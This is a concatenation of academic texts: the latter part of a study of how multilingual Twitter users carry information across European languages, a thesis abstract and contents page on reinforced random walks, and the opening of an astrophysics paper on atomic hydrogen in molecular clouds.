an uneven interest by linguists across languages. We avoid multicollinearity issues by ensuring that all variables' variance inflation factor is under 4. We thus exclude highly-correlated variables, such as EU membership and each country's population. We weight each regression model by the number of treated units from each locus. Finally, we scale all variables by z-score to facilitate direct comparisons. ### Regression results **Geography** Multilinguals have a larger effect on cross-lingual information exchange in MCPs where \(C_{x}\) and \(C_{y}\) are further away from each other (Table 3). We visualize this pattern in Figure 3, which shows the relationship between geography and effects of multilinguals on betweenness centrality and domain sharing (see Figure S4 in Supplemental Material for the hashtag sharing map). 
In Figure 3, the effect of multilinguals in MCP \((C_{x},C_{y})\) and locus \(C_{x}\) is shown as a directed edge from \(C_{y}\) to \(C_{x}\). Only edges corresponding to significant estimates are drawn. Negative effects are red, positive effects are blue, and greater magnitude is represented with darker and thicker edges. For example, the dark blue edge from Russia to Spain in both maps indicates that Russian-Spanish multilinguals are especially important for bringing Russian information to Spain. In contrast, the faint edge from Portugal to Spain means that Portuguese-Spanish multilinguals have a smaller role in importing Portuguese information to Spain. We believe stronger treatment effects across longer distances are due to information accessibility. Information from faraway places is not readily accessible for monolinguals, so they may need to rely more on their multilingual friends to serve as information brokers. On the other hand, information between nearby countries such as Norway and Sweden may be more easily accessible with more channels for diffusion, possibly via more multilingual, so users rely less on individual multilinguals to spread information. In addition to distance, the time difference between \(C_{x}\) and \(C_{y}\) significantly predicts multilinguals' effects (Table 3). Multilinguals have the largest impact when \(C_{y}\) is 2-3 hours ahead (i.e., further east) of \(C_{x}\) (see Figure S1 in Supplemental Material). In other words, multilinguals have a large impact on spreading information from Eastern European languages to Western Europe. This asymmetric East-West pattern is visible in both maps of Figure 3 (e.g. the many dark blue outgoing links from Russia indicate a large influence of multilingual users from other countries who post in Russian). Why are Western European users of Eastern European languages so influential in cross-lingual information exchange? Fully answering this question is left for future work, but we speculate that it is a consequence of historical inaccessibility to information across strict Cold War-era borders. Additionally, offline connections may explain these users' online role as bridges; Eastern migrants in Western Europe have been characterized by more transnational and circular offline networks since the early 2000s [12]. DemographicsMultilingualism increases betweenness centrality more for users in smaller countries who post in more populous countries' languages, but this relationship is not significant for content sharing outcomes. While multilinguals in smaller countries are better positioned within MCP networks to spread novel information, they do not necessarily "import" information from the larger to smaller country. When \(C_{y}\) has a higher proportion of foreign-born residents, \((L_{x},L_{y})\) multilingual has a greater impact on \begin{table} \begin{tabular}{l c c c} \hline \hline & \multicolumn{4}{c}{_Dependent variable:_} \\ \cline{2-4} & Betweenness & Domain & Hashtag \\ & Centrality & Sharing & Sharing \\ \hline Geographic distance & \(0.020^{***}\) & \(0.434\) & \(0.412^{***}\) \\ Time difference & \(0.015^{**}\) & \(0.815^{***}\) & \(0.001\) \\ \hline Pop. \(C_{x}\) / \(C_{y}\) & \(-0.030^{***}\) & \(-0.031\) & \(0.017\) \\ \% \(C_{y}\) foreign-born & \(0.021^{**}\) & \(-1.100^{**}\) & \(-0.058\) \\ \% \(C_{y}\) pop. born in \(C_{x}\) & \(0.017^{**}\) & \(-0.044\) & \(-0.043\) \\ \% \(C_{x}\) foreign-born & \(-0.002\) & \(-0.031\) & \(0.064\) \\ \% \(C_{x}\) pop. 
born in \(C_{y}\) & \(0.007\) & \(-0.197\) & \(-0.040\) \\ \hline GDP per capita \(C_{x}\) / \(C_{y}\) & \(0.038^{***}\) & \(0.318\) & \(1.171^{***}\) \\ RTA & \(0.010\) & \(-0.411\) & \(0.216^{*}\) \\ Tradeflow per capita & \(-0.013^{*}\) & \(0.425\) & \(0.109\) \\ \hline \% \(C_{x}\)’s conflicts vs. \(C_{y}\) & \(0.019^{**}\) & \(-0.159\) & \(-0.032\) \\ \% \(C_{y}\)’s conflicts vs. \(C_{x}\) & \(0.002\) & \(-0.257\) & \(0.088\) \\ \hline Linguistic distance & \(-0.027^{***}\) & \(0.449\) & \(0.146^{*}\) \\ \hline Observations & 317 & 205 & 284 \\ R\({}^{2}\) & 0.266 & 0.193 & 0.448 \\ \hline \multicolumn{4}{l}{_Note:_} & \multicolumn{2}{c}{\({}^{*}\)p\(<\)0.1; \({}^{**}\)p\(<\)0.05; \({}^{***}\)p\(<\)0.01} \\ \end{tabular} \end{table} Table 3: Geographic, demographic, economic, political, and linguistic aspects of relations between countries \(C_{x}\) and \(C_{y}\) and their associations with the role of multilinguals spreading information from \(C_{y}\)’s dominant language to \(C_{x}\). Coefficients are from weighted linear regression models where the dependent variables are the locus-specific causal effects (ATTs) of multilingual behaviors in Studies 1-3. Figure 3: Maps of causal effects (ATTs) of multilingual treatments on information diffusion outcomes. The left map shows the ATTs of multilingual posting on betweenness centrality (Study 1), where each edge indicates ATT among users from the _destination_ node who post in both the source and destination nodes’ dominant languages. The right map shows the ATTs of having a multilingual friend on cross-lingual domain sharing (Study 2), where each edge indicates ATT among monolingual users from the _destination_ node on sharing URL domains associated with the _source_ node’s dominant language. Negative effects are shown with red arrows and positive are shown with blue arrows. The magnitude of the causal effect is indicated by arrow shading and width. Only statistically significant estimates (\(p<0.05\)) with robust standard error estimation are shown. users' structural role in \(C_{x}\), but not communication influence. In fact, having a multilingual friend has a negative impact on sharing a domain from \(L_{y}\) when \(C_{y}\) has more foreign-born residents; perhaps this is because shared links from \(L_{y}\) feature more content with multicultural or international appeal, so people rely less on multilinguals as information brokers. We observe no significant effects of the foreign-born population of \(C_{x}\) on either the structural role or communication influence of multilinguals. Economics and politicsMultilinguals' effects are associated with GDP per capita: multilinguals in \(C_{x}\) have more influence when \(C_{x}\) is wealthier than \(C_{y}\) (although this is not significant for domain sharing). However, government-level relationships including national trade agreements, trade-flows, and political conflict are not significant predictors. Linguistic similarityWe observe mixed results for linguistic distance. Our information accessibility hypothesis suggests \((L_{x},L_{y})\) multilinguals would play a larger role when \(L_{x}\) and \(L_{y}\) are very different because their monolingual peers would rely more heavily on them. This pattern appears to hold for communication influence outcomes but is not significant. Contrary to our hypothesis, multilinguals' structural role is amplified when \(L_{x}\) and \(L_{y}\) are closely related. 
Though we do not have a clear explanation for this pattern, it may be driven by deeper differences in the structures of MCP networks connecting countries with similar dominant languages [11]. ## 7 Variation across topics Different aspects of content, such as topic, framing, sentiment, and subjectivity, could amplify or hinder multilinguals' influence. Therefore, here we extend Study 3 to investigate how the role of multilinguals depends on the topic of shared hashtags using unsupervised topic modeling [13, 14]. Specifically, for each MCP \((C_{x},C_{y})\) we measure how having a multilingual \((L_{x},L_{y})\) friend affects the odds of an \(L_{x}\) monolingual from \(C_{x}\) sharing a _topic-specific hashtag_ from \(C_{y}\). ### Measuring multilinguals' role across topics **Identifying topic-specific hashtags** We train a multilingual contextualized topic model (CTM) to identify topics [1]. This approach uses multilingual sentence-BERT [10] as input to a variational autoencoder topic model to support zero-shot topic prediction for texts in unseen languages during training [15, 1]. Crucially, the CTM uses the same topics in all languages, making direct comparisons across languages possible. The CTM is trained for 20 epochs on a random sample of 1M English-language tweets from the European Decahose data. We set the total number of topics to 50 and retain default values for all other hyperparameters. We use the trained CTM to predict topic distributions for all tweets containing any hashtag highly associated with any language in any time interval. Tweets are assigned to the single topic with the highest probability, and hashtags are then assigned to single topics based on the most frequent topic of the tweets in which they appear. We then manually inspect the ten most-frequent hashtags per topic to identify 15 topics of interest, where hashtags are coherent, meaningful, and reflect different types of content. These 15 topics account for 52.1% of European tweets from our dataset, and 66.8% of unique hashtags associated with any language at any time, which rises to 82.5% when accounting for hashtag frequency (see topic distributions in Figure S3 in Supplemental Material). Brief topic descriptions are in Table 4. To understand how content shapes multilinguals' influence, we separate the 15 topics into four macro-categories: entertainment, politics, sports, and promotion (e.g., giveaways). The distribution of hashtag macro-categories across languages is shown in Figure S2 in the Supplemental Material. **Evaluation** We evaluated our multilingual hashtag topic assignment method with intrusion tests, following common practice [12]. Four hashtags were sampled from each topic \(t\) with frequency weighting, and one hashtag was sampled from one of the 49 other topics based on frequency. Annotators tried to identify which hashtag does _not_ belong to \(t\). We evaluated the 15 topics of interest in English, German, Spanish, Italian, and Turkish, selected based on annotators' language proficiencies. We conducted ten intruder tests for each topic in English, and five for each topic in the other languages. Three annotators completed the intruder test for English hashtags with an average accuracy of 0.73 and interannotator agreement of 0.67 (Krippendorff \(\alpha\)). Among tasks where at least two annotators selected the same intruder, accuracy rose to 0.78, and further rose to 0.89 for tasks where all three annotators agreed.
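The hashtag-to-topic assignment described above reduces to a short aggregation step once the topic model has produced per-tweet topic distributions. A minimal sketch follows; the data structures are illustrative, and `topic_probs` stands in for the trained CTM's predictions.

```python
from collections import Counter, defaultdict
import numpy as np

def assign_hashtag_topics(tweet_hashtags, topic_probs):
    """Assign every hashtag to a single topic: each tweet gets its argmax topic,
    and each hashtag inherits the most frequent topic among the tweets containing it.

    tweet_hashtags: list of hashtag lists, one per tweet
    topic_probs:    (n_tweets, n_topics) array of topic distributions,
                    e.g. as predicted by the contextualized topic model"""
    tag_topics = defaultdict(Counter)
    for tags, probs in zip(tweet_hashtags, topic_probs):
        top = int(np.argmax(probs))          # single topic with highest probability
        for tag in tags:
            tag_topics[tag][top] += 1
    return {tag: counts.most_common(1)[0][0] for tag, counts in tag_topics.items()}
```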
**Estimating causal effects** We extend Study 3's design to compare multilinguals' effects across topics. For a given MCP \((C_{x},C_{y})\) and locus \(C_{x}\), units are \(L_{x}\) monolinguals from \(C_{x}\) and the treatment is having at least one multilingual \((L_{x},L_{y})\) contact. For each topic \(t\), the outcome is whether a user shares a hashtag that belongs to topic \(t\) and is associated with \(L_{y}\). Our analysis focuses on overall causal effect estimates for all 15 topics. We also estimate locus-specific effects for each macro-category, with a summary of results and maps in the Supplemental Material (Figure S4). \begin{table} \begin{tabular}{l l l} **ID** & **Description** & **Example Hashtags** \\ \hline 1 & TV Shows & _skamitala, masterchefer, theachers, ibes_ \\ 10 & Fandoms & _jungkokok, cholicelandan, saveshedwhutters_ \\ 19 & Art & _painting, etsv, vintage, faison, archiceture, arte_ \\ 24 & Romance TV & _loveisland, poweroflowge, liebesgschichten_ \\ 44 & TV Promo & _comingsoam, lucidrometlik, sybunex_ \\ 3 & Job Promo & _career, hinging, johstarp, sales, jokesarch_ \\ 16 & Giveaways & _giveaways, freeble Friday, sortee, winwin, free_ \\ 31 & Music Promo & _radio, youtube, hits, newmusic, magic/tin, live_ \\ 11 & Government, News & _bheneva, 4fd, nadad, labour, parliament, orphan_ \\ 23 & Covid, Crisis, Tech & _coudi19France, konomavirus, polzic, tech, gdpr_ \\ 30 & International Politics & _france, syria, venezuela, eeua, iss, nigranti_ \\ 41 & Health & _mentahealth, autism, calapidens, disacapicalad_ \\ 46 & Requests & _stop, sabololopisielasjames, helpme_ \\ 47 & Equality & _metoo, sabemzzo, welfrauentag, racisme, lgbt_ \\ 48 & Sports & _arsenal, halamadrid, futhol, fcporte, rusia2018_ \\ \end{tabular} \end{table} Table 4: Fifteen topics of interest with example hashtags \begin{table} \begin{tabular}{l l l l l l} Language & English & Spanish & German & Turkish & Italian \\ \hline Accuracy & 0.731 & 0.747 & 0.813 & 0.587 & 0.627 \\ \end{tabular} \end{table} Table 5: Annotator accuracy on topic intrusion tests, averaged over 3 annotators for English. ### Results Figure 4 shows the effect of multilinguals by hashtag topic and macro-category. Three key findings support our hypothesis that multilinguals play a greater role in spreading information that is otherwise less accessible to their peers. First, multilinguals have a greater communication influence on the cross-lingual diffusion of political content than entertainment. Political discourse likely occurs more in regional or country-centric public spheres Schunemann (2020), so there is a greater reliance on multilingual individuals to broker political information across borders. Correspondingly, of all political topics, multilinguals play a smaller role for topics with widespread transnational popularity and awareness, such as _Equality_, which includes hashtags for global gender equality movements like #metoo and #8m, and _International Politics_, which includes country names and non-European political organizations. Contrary to most political hashtags, entertainment hashtags often reflect globally-popular phenomena (e.g., K-pop fandoms) despite being associated with specific languages, and more cross-lingual information cascades involve entertainment content Jin (2017). We believe that individual multilingual contacts play a smaller role in entertainment because there are more ways for that content to spread.
Second, we argue that multilingual individuals are crucial for nascent social movements to gain global traction, but have a relatively small influence within well-established transnational movements. Figure 4 indicates that multilinguals have a large impact on spreading health-related information, which includes hashtags advocating for mental health awareness, COVID-related activism, and disability rights. In contrast to racial and gender equality movements reflected in the _Equality_ topic, organizing for disability rights gained traction as a social movement later than for race and gender both offline and on Twitter, where the public sphere about disability is still growing Scotch (1988); Sarkar et al. (2021). The initial adoption of burgeoning social movements across countries relies heavily on direct contacts, such as multilingual friends McAdam and Rucht (1993). Information diffusion about more well-established social movements do not depend on multilingual bridges because it occurs via many channels of communication, including news and television media McAdam and Rucht (1993). Third, multilinguals play an especially important role in sharing information about job searches and career opportunities. This parallels Granovetter (1973)'s argument about the strength of weak ties for job-seeking purposes. Even though monolingual users' ties with multilinguals are not necessarily weak, multilinguals similarly serve as bridges between different parts of a social network and thus facilitate access to novel information, such as job opportunities that users may not have otherwise been aware of. ## 8 Discussion Gaining a complete picture of global information diffusion requires understanding how information crosses languages. We design three studies to investigate how multilingual users participate in this process, which we use to quantify their structural role and communication influence in information exchange across European languages on Twitter. For each pair of countries with different dominant languages, we construct networks where users are connected if they have mutually "mentioned" each other. We use these networks in Study 1 to quantify the extent to which multilinguals' positions in these networks facilitate spreading novel information, as measured by betweenness centrality. In Studies 2 and 3, we quantify how having a multilingual contact influences the odds of monolingual users posting content from the other country's dominant language. Results from all three studies show that multilinguals play an outsize role in cross-lingual information exchange compared to their monolingual peers. Effects vary widely but systematically across country pairs and topics. We conduct regression analyses to measure how the role of multilinguals is associated with demographic, geographic, economic, political, and linguistic aspects of the relationship between country pairs. To compare multilinguals' influence across topics, we augment our study design for hashtag sharing with multilingual contextualized topic modeling. In general, multilingual individuals have a greater influence on the spread of information that is otherwise _less_ accessible to their monolingual peers, as they play more of a Figure 4: Causal effect (ATT) of having a multilingual friend on cross-lingual hashtag sharing across topics. All estimates have heteroskedasticity-consistent standard errors below 0.03 and are significant (p\(<\)0.0001). 
The x-axis shows log odds ratios, with 0 being no effect of having a multilingual friend, and the dashed line at 1.38 shows the overall effect on hashtag sharing. Colors represent macro-categories. gatekeeping role. Multilinguals have a greater effect on information diffusion between dominant languages of countries that are geographically far apart, with Western European multilinguals who post in Eastern European languages having an especially big influence. We identify a similar pattern for topics, where multilinguals have greater influence on cross-lingual information exchange for topics discussed in more restricted public spheres: national or regionally-oriented politics over entertainment which can have international appeal, nascent health-related social movements over established racial and gender equality movements, and job opportunities previously known only to small communities. We acknowledge that this work has important limitations. First, our studies do not account for multilinguals who use minority languages (e.g., Basque) or reside in highly multilingual countries (e.g., Switzerland). Imperfect performance of location inference and language detection also limited the set of countries and languages studied. Furthermore, we make the simplifying assumption that tweets are written in one language, which does not adequately account for code-mixing within posts and the users who engage in such practices [1]. While code-mixed tweets are a relatively small percent of Twitter communication [13], accurately recognizing these tweets at scale has proven challenging due to the absence of labeled data for training models [10]. As the performance and efficiency of language detection of code-mixed tweets improve, we anticipate that incorporating such information would be fruitful, and analyzing the relationship between code-mixing strategies and information diffusion could yield interesting theoretical insights. To avoid making assumptions about people's offline language usage or competence, we intentionally define multilinguals based on their performance on Twitter. However, this presents a significant limitation: users who only tweet in one language but understand multiple may also play an important, and perhaps different, role in information diffusion. Future research could employ different methodologies to highlight these users, such as linking social media activity with survey data about users' language backgrounds. Further research can also improve upon our study designs. We adopt a traditional causal inference setup, which considers treatment status binary to emulate randomized experiments. Thus, all of our studies involve collapsing underlying continuous variables into binary indicators. A possible next step would involve adapting our studies to account for continuous treatments; this would facilitate investigation of how cross-lingual information exchange is impacted by a user's degree of multilingualism (Study 1) or the number and/or strength of a user's ties to multilinguals (Studies 2 and 3). Beyond addressing these limitations, there are numerous avenues for future work. For example, we adopt a microscopic perspective on information diffusion by examining how multilingual impacts individual users' roles in information diffusion; we focus on local influence because it is more precise and less random than observations of information cascades [1]. 
Nevertheless, an interesting extension that takes a macroscopic perspective, perhaps involving simulations of cross-lingual information cascades [11], could help contextualize how these individual-level effects, in aggregate, shape the global flow of information. Another future direction would involve considering other forms of information that may spread via different mechanisms than URLs and hashtags, such as meme templates, images, videos, and text outside of hashtags. There is likely variation in the role of multilinguals across semantic dimensions beyond topic, such as emotional valence or misinformation. Finally, future research can assess the generalizability of our findings beyond the scope of European Twitter by applying our methodology to study other regions, languages, and platforms. ## 9 Broader impact and ethical considerations Understanding the role of multilinguals in information diffusion has immense consequences. Platforms like Twitter can empower multilinguals to spread information that supports positive outcomes such as knowledge-sharing, collaboration, crisis response, or social progress, thus enabling different language communities to benefit from a truly global social network [1, 12]. Our study not only highlights this potential but also identifies how it varies across topics and with respect to the geographical, linguistic, and political relationship between the countries. For instance, our research suggests that multilinguals can be better utilized to spread political news as opposed to entertainment. We also see that their importance is more pronounced for supporting information spread across countries further away from each other. Such findings not only highlight the contexts where multilinguals already play an important role but also help us identify the barriers for cross-lingual diffusion; in such situations, platforms may benefit more from technologies such as machine translation. Our research can also help platforms address dangerous consequences of global networks by focusing efforts on nudging multilinguals to mitigate the spread of harmful information such as misinformation, conspiracy theories, or online abuse. Past network science research shows the value of betweenness centrality in identifying nodes that can limit the spread of such information [15]. Here, we show that multilingual nodes tend to have high betweenness centrality. Furthermore, our study shows that multilinguals play a particularly important role in the spread of political topics, common targets for malicious actors aiming to spread propaganda and disinformation. Despite the potential for positive impact, we acknowledge the ethical risks of this work. Rather than stem the flow of harmful content, our work may inspire malicious agents to target and manipulate multilinguals into propagating such information. In addition, our focus on users of politically and socially-dominant language varieties and use of automated language detection excludes people whose posts contain endangered or minority languages, non-prestige dialects of dominant languages, or code-mixing. Although our work does not present direct harm to individuals, these decisions systematically exclude marginalized groups whose online behavior deserves equal consideration. To promote transparency and future research, we publicly share data, code, and models but take steps to preserve user privacy. The datasheets shared for causal effect estimation include only variables necessary to replicate our results. 
We do not share user IDs, raw text, or other personally-identifiable information. While the location inference tool used presents a privacy risk by inferring users' specific geo-coordinates, we only store information at the country level. ## 10 Conclusion By developing a set of causal inference studies that measure users' structural role and communication influence, we show that multilingually-posting users on European Twitter are particularly important for information diffusion across languages. These users have an especially large influence in situations where they serve more as gatekeepers in information flow, particularly in spreading information from places and topics that are otherwise inaccessible to their monolingual peers. This work is crucial for understanding how information is shared around the world, and has implications for platforms to support beneficial consequences of global social networks while mitigating potential harms. Publicly-available code, models, and aggregated data can be found at: [https://github.com/juliamendelsohn/bridging-nations](https://github.com/juliamendelsohn/bridging-nations). ## Acknowledgments This research was supported by the National Science Foundation (Grants IIS-1815875 and IIS-2007251) and through funding from the Volkswagen Foundation.
2309.02475
Variations on Reinforced Random Walks
This thesis examines edge-reinforced random walks with some modifications to the standard definition. An overview of known results relating to the standard model is given and the proof of recurrence for the standard linearly edge-reinforced random walk on bounded degree graphs with small initial edge weights is repeated. Then, the edge-reinforced random walk with multiple walkers influencing each other is considered. The following new results are shown: on a segment of three nodes, the edge weights resemble a P\'olya urn and the fraction of the edge weights divided by the total weight forms a converging martingale. On Z, the behavior is the same as for a single walker - either all walkers have finite range or all walkers are recurrent. Finally, edge-reinforced random walks with a bias in a certain direction are analysed, in particular on Z. It is shown that the bias can introduce a phase transition between recurrence and transience, depending on the strength of the bias, thus fundamentally altering the behavior in comparison to the standard linearly reinforced random walk.
Fabian Michel
2023-09-05T13:16:41Z
http://arxiv.org/abs/2309.02475v1
# Technical University of Munich Department of Mathematics Master's Thesis in Mathematics Variations on Reinforced Random Walks Abwandlungen selbstverstarkender Irrfahrten Fabian Michel Supervisor: Prof. Dr. rer. nat. habil. Nina Gantert Submission Date: 16/09/2022 final digital version I confirm that this master's thesis is my own work and I have documented all sources and material used. ###### Abstract This thesis examines edge-reinforced random walks with some modifications to the standard definition. An overview of known results relating to the standard model is given and the proof of recurrence for the standard linearly edge-reinforced random walk on bounded degree graphs with small initial edge weights is repeated. Then, the edge-reinforced random walk with multiple walkers influencing each other is considered. The following new results are shown: on a segment of three nodes, the edge weights resemble a Pólya urn and the fraction of the edge weights divided by the total weight forms a converging martingale. On \(\mathbb{Z}\), the behavior is the same as for a single walker - either all walkers have finite range or all walkers are recurrent. Finally, edge-reinforced random walks with a bias in a certain direction are analysed, in particular on \(\mathbb{Z}\). It is shown that the bias can introduce a phase transition between recurrence and transience, depending on the strength of the bias, thus fundamentally altering the behavior in comparison to the standard linearly reinforced random walk.
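To make the object of study concrete, a minimal simulation sketch of a linearly edge-reinforced random walk on \(\mathbb{Z}\) with an optional directional bias is given below. It is an illustration only: the multiplicative bias used here is an assumption and need not coincide with the \(\lambda^{*}\)- or \(\lambda^{+}\)-biased definitions analysed in the thesis.

```python
import random
from collections import defaultdict

def linearly_reinforced_walk(steps, a=1.0, bias=1.0, seed=0):
    """Linearly edge-reinforced random walk on Z (illustrative sketch).

    Every edge {x, x+1} starts with weight `a`; after each traversal the weight
    of the crossed edge increases by 1.  `bias > 1` multiplies the weight of the
    rightward edge when choosing the next step (a simple, assumed way to bias
    the walk in a fixed direction)."""
    rng = random.Random(seed)
    w = defaultdict(lambda: a)          # w[x] = current weight of edge {x, x+1}
    x, path = 0, [0]
    for _ in range(steps):
        right, left = bias * w[x], w[x - 1]
        if rng.random() < right / (right + left):
            w[x] += 1                   # reinforce the traversed edge
            x += 1
        else:
            w[x - 1] += 1
            x -= 1
        path.append(x)
    return path

# e.g. compare typical ranges and returns to the origin for bias=1.0 vs. bias=1.5
# path = linearly_reinforced_walk(10_000, a=1.0, bias=1.5)
```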
###### Contents * List of Figures * List of Tables * 1 Introduction * 1.1 Literature * 1.2 Main Results * 2 Preliminaries * 2.1 Random Walks * 3 Selected Results * 3.1 Reinforced Random Walks * 3.1.1 Linearly Edge-Reinforced Random Walk * 3.1.2 Vertex-Reinforced Random Walk * 3.2 Urn Models * 3.2.1 Pólya Urn * 3.2.2 Randomly Reinforced Urn * 4 Recurrence of Edge-Reinforced Random Walk * 4.1 Estimating Conductance Ratios * 4.2 Bounding the Error * 4.3 Bounding the Estimate * 4.4 Proof of Recurrence * 5 Reinforced Random Walk with Multiple Walkers * 5.1 A Two-Player Urn * 5.1.1 Alternating Players * 5.1.2 Random Player Selection * 5.2 Model on \(\mathbb{Z}\) * 5.3 Recurrence or Finite Range on \(\mathbb{Z}\) * 6 Biased Reinforced Random Walk * 6.1 \(\lambda^{*}\)-Biased Edge-Reinforced Random Walk * 6.1.1 Some Simulations * 6.1.2 Stochastic Approximation * 6.2 \(\lambda^{+}\)-Biased Edge-Reinforced Random Walk * Reinforced Random Walk on Transient Environment * Conclusion List of Figures * 1 Estimating conductance ratios * 2 Estimating conductance ratios along a deterministic path \(\gamma\) * 3 Bounding \(Q\) with the help of Bernoulli random variables * 4 Edge weights of the line segment at time \(n\) * 5 Possible walker locations after \(2l-1\) steps of a path \(\rho\) of length \(2l\) * 6 Edge weights on \(\mathbb{Z}\) at time \(n\) * 7 Evolution of the supermartingale during 4 steps of the ERRW with multiple walkers * 8 Label exchange lemma * 9 Illustration: proof that all walkers recurrent or all have finite range * 10 Edge weights and transition probabilities for the biased walk on \(\mathbb{Z}\) at time \(n\) * 11 Average speed of the random walk * 12 Average last visit to the root by the random walk * 13 Transition probabilities of the \(\lambda^{*}\)-biased ERRW on the triangle at time \(n\) * 14 The vector field of the differential equation on the unit simplex * 15 A random walk in a random environment on \(\mathbb{Z}\) * 16 Edge weights of the walk on transient environment at time of first visit to \(z>0\) List of Tables * 1 Overview of results and conjectures on modified reinforced walks
2308.13889
HI in Molecular Clouds: Irradiation by FUV plus Cosmic Rays
We extend the analytic theory presented by Sternberg et al. (2014) and Bialy & Sternberg (2016) for the production of atomic hydrogen (HI) via FUV photodissociation at the boundaries of dense interstellar molecular (H$_2$) clouds, to also include the effects of penetrating (low-energy) cosmic-rays for the growth of the total HI column densities. We compute the steady-state abundances of the HI and H$_2$ in one-dimensional gas slabs in which the FUV photodissociation rates are reduced by depth-dependent H$_2$ self-shielding and dust absorption, and in which the cosmic-ray ionization rates are either constant or reduced by transport effects. The solutions for the HI and H$_2$ density profiles and the integrated HI columns, depend primarily on the ratios $I_{\rm UV}/Rn$ and $\zeta/Rn$, where $I_{\rm UV}$ is the intensity of the photodissociating FUV field, $\zeta$ is the H$_2$ cosmic-ray ionization rate, $n$ is the hydrogen gas density, and $R$ is the dust-surface H$_2$ formation rate coefficient. We present computations for a wide range of FUV field strengths, cosmic-ray ionization rates, and dust-to-gas ratios. We develop analytic expressions for the growth of the HI column densities. For Galactic giant molecular clouds (GMCs) with multiphased (warm/cold) HI envelopes, the interior cosmic-ray zones will dominate the production of the HI only if $\zeta \gtrsim 4.5\times 10^{-16} \times (M_{\rm GMC}/10^6 \ M_{\odot})^{-1/2}$~s$^{-1}$, where $M_{\rm GMC}$ is the GMC mass, and including attenuation of the cosmic-ray fluxes. For most Galactic GMCs and conditions, FUV photodissociation dominates over cosmic-ray ionization for the production of the HI column densities. Furthermore, the cosmic-rays do not affect the HI-to-H$_2$ transition points.
Amiel Sternberg, Shmuel Bialy, Alon Gurman
2023-08-26T14:20:55Z
http://arxiv.org/abs/2308.13889v2
# HI in Molecular Clouds: Irradiation by FUV plus Cosmic Rays ###### Abstract We extend the analytic theory presented by Sternberg et al. (2014) and Bialy & Sternberg (2016) for the production of atomic hydrogen (HI) via FUV photodissociation at the boundaries of dense interstellar molecular (H\({}_{2}\)) clouds, to also include the effects of penetrating (low-energy) cosmic-rays for the growth of the total HI column densities. We compute the steady-state abundances of the HI and H\({}_{2}\) in one-dimensional gas slabs in which the FUV photodissociation rates are reduced by depth-dependent H\({}_{2}\) self-shielding and dust absorption, and in which the cosmic-ray ionization rates are either constant or reduced by transport effects. The solutions for the HI and H\({}_{2}\) density profiles and the integrated HI columns, depend primarily on the ratios \(I_{\rm UV}/Rn\) and \(\zeta/Rn\), where \(I_{\rm UV}\) is the intensity of the photodissociating FUV field, \(\zeta\) is the H\({}_{2}\) cosmic-ray ionization rate, \(n\) is the hydrogen gas density, and \(R\) is the dust-surface H\({}_{2}\) formation rate coefficient. We present computations for a wide range of FUV field strengths, cosmic-ray ionization rates, and dust-to-gas ratios. We develop analytic expressions for the growth of the HI column densities. For Galactic giant molecular clouds (GMCs) with multiphased (warm/cold) HI envelopes, the interior cosmic-ray zones will dominate the production of the HI only if \(\zeta\gtrsim 4.5\times 10^{-16}\times(M_{\rm GMC}/10^{6}~{}M_{\odot})^{-1/2}~{} \rm s^{-1}\), where \(M_{\rm GMC}\) is the GMC mass, and including attenuation of the cosmic-ray fluxes. For most Galactic GMCs and conditions, FUV photodissociation dominates over cosmic-ray ionization for the production of the HI column densities. Furthermore, the cosmic-rays do not affect the HI-to-H\({}_{2}\) transition points. galaxies:ISM - ISM:clouds - ISM: HI and H\({}_{2}\) - ISM:cosmic rays 0000-0002-0002-0880-0880]Amiel Sternberg ## 1 Introduction The compression of diffuse and warm interstellar atomic hydrogen (HI) gas into dense cold giant molecular (H\({}_{2}\)) clouds (GMCs) is associated with radiative cooling, gravitational collapse, chemical complexity, and galaxy- star- and planet-formation across cosmic time (McKee and Ostriker, 2007; Tacconi et al., 2020; Chevance et al., 2022; Sternberg et al., 2014, hereafter S14). Much of the cold (\(\lesssim 500\) K) HI observed via 21 cm emissions and absorptions in the interstellar medium (ISM) of galaxies is produced in photodissociation regions (PDRs) in the atomic to molecular (HI-to-H\({}_{2}\)) transition layers of the dense star-forming molecular clouds (Allen et al., 1986; Heiner et al., 2011; Walter et al., 2008; Bialy et al., 2017; Schruba et al., 2018; Saintonge and Catinella, 2022). In recent years, hydrodynamical simulations of ever increasing sophistication have been incorporating the coupled radiative transfer and chemical processes necessary for appropriate modeling of the cold HI and H\({}_{2}\) components of the ISM (Bialy et al., 2017; Nickerson et al., 2018; Inoue et al., 2020; Seifried et al., 2022; Katz et al., 2022; Gebek et al., 2023; Hu et al., 2021, 2022; Hopkins et al., 2023; Kim et al., 2023; Gurman et al., 2023). 
Semianalytic methodology, including "classical" one-dimensional (1D) PDR modeling (Tielens and Hollenbach, 1985; van Dishoeck and Black, 1988; Sternberg and Dalgarno, 1989; Wolfire et al., 2022) remain essential tools for interpreting observations, and for understanding and post-processing the results of the hydrodynamical simulations (Levrier et al., 2012; Bialy and Sternberg, 2016; Rollig & Ossenkopf-Okada, 2022; Pound & Wolfire, 2023; Kim et al., 2023a; Bisbas et al., 2023). H\({}_{2}\) photodissociation by far-ultraviolet (FUV, \(\sim 1000\) A) radiation is limited by dust absorption to typical hydrogen gas column densities of \(\sim 10^{21}\) cm\({}^{-2}\) (or gas surface densities \(\Sigma_{\rm gas}\sim 11\) M\({}_{\odot}\) pc\({}^{-2}\) including helium) with temperatures \(\sim 100\) K. At greater cloud depths a residual (but still significant) abundance of ultra-cold (\(\sim 20\) K) atomic hydrogen may be maintained by low-energy (\(\lesssim 1\) Gev) cosmic ray proton bombardment (Spitzer & Tomasko, 1968; Solomon & Werner, 1971; Dalgarno, 2006; Gabici, 2022), and observable as "HI narrow self-absorption" (HINSA) features in 21 cm line profiles (Knapp, 1974; Li & Goldsmith, 2003; Goldsmith et al., 2007; Seifried et al., 2022). What are the relative contributions of FUV photodissociation and cosmic-ray bombardment to the production of HI in typical molecular clouds in star-forming galaxies? In S14 and Bialy & Sternberg (2016, hereafter BS16) we presented numerical and analytic theory for the HI column densities produced by photodissociation in the HI-to-H\({}_{2}\) transition layers in optically thick and dusty PDRs, but with the exclusion of cosmic-rays. In Bialy & Sternberg (2015) we investigated the HI/H\({}_{2}\) balance in low-metallicity cloud interiors dominated by cosmic-ray processes, but with no FUV. In Sternberg et al. (2021) we did consider combined FUV and cosmic-ray irradiation, but for dust-_free_ systems in which cosmic-ray ionization, rather than dust catalysis, drives a gas-phase conversion of HI to H\({}_{2}\), and in which the attenuation of the photodissociation rate is via pure H\({}_{2}\) absorption line self-shielding. Such dust-free PDRs may be relevant for young Universe conditions at the epoch of first star-formation. In this paper, we extend the analytic theory we presented in S14 and 